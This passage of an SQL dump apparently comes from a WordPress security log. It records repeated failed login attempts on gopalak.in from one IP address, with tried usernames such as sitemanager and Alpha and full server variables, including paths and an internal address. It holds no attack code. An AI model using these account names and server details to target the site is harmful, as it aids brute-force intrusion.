05:44:25'),(95771,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58797\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747089007.7257819;s:12:\"REQUEST_TIME\";i:1747089007;}}','43.205.255.0',1,'2025-05-13 04:00:10','2025-05-14 05:44:25'),(95772,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58800\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747089007.7252271;s:12:\"REQUEST_TIME\";i:1747089007;}}','43.205.255.0',1,'2025-05-13 04:00:10','2025-05-14 05:44:25'),(95773,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58802\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747089009.3934259;s:12:\"REQUEST_TIME\";i:1747089009;}}','43.205.255.0',1,'2025-05-13 04:00:10','2025-05-14 05:44:25'),(95774,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58798\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747089009.392776;s:12:\"REQUEST_TIME\";i:1747089009;}}','43.205.255.0',1,'2025-05-13 04:00:10','2025-05-14 05:44:25'),(95775,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58808\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747089010.454998;s:12:\"REQUEST_TIME\";i:1747089010;}}','43.205.255.0',1,'2025-05-13 04:00:11','2025-05-14 05:44:25'),(95776,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56222\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747089695.721823;s:12:\"REQUEST_TIME\";i:1747089695;}}','43.205.255.0',1,'2025-05-13 04:11:38','2025-05-14 05:44:25'),(95777,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56226\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747089695.7211859;s:12:\"REQUEST_TIME\";i:1747089695;}}','43.205.255.0',1,'2025-05-13 04:11:38','2025-05-14 05:44:25'),(95778,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56224\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747089697.3727729;s:12:\"REQUEST_TIME\";i:1747089697;}}','43.205.255.0',1,'2025-05-13 04:11:38','2025-05-14 05:44:25'),(95779,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56228\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747089697.3733399;s:12:\"REQUEST_TIME\";i:1747089697;}}','43.205.255.0',1,'2025-05-13 04:11:38','2025-05-14 05:44:25'),(95780,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56227\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747089695.725667;s:12:\"REQUEST_TIME\";i:1747089695;}}','43.205.255.0',1,'2025-05-13 04:11:43','2025-05-14 05:44:25'),(95781,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51576\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747090377.546226;s:12:\"REQUEST_TIME\";i:1747090377;}}','43.205.255.0',1,'2025-05-13 04:23:00','2025-05-14 05:44:25'),(95782,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51574\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747090377.5468011;s:12:\"REQUEST_TIME\";i:1747090377;}}','43.205.255.0',1,'2025-05-13 04:23:00','2025-05-14 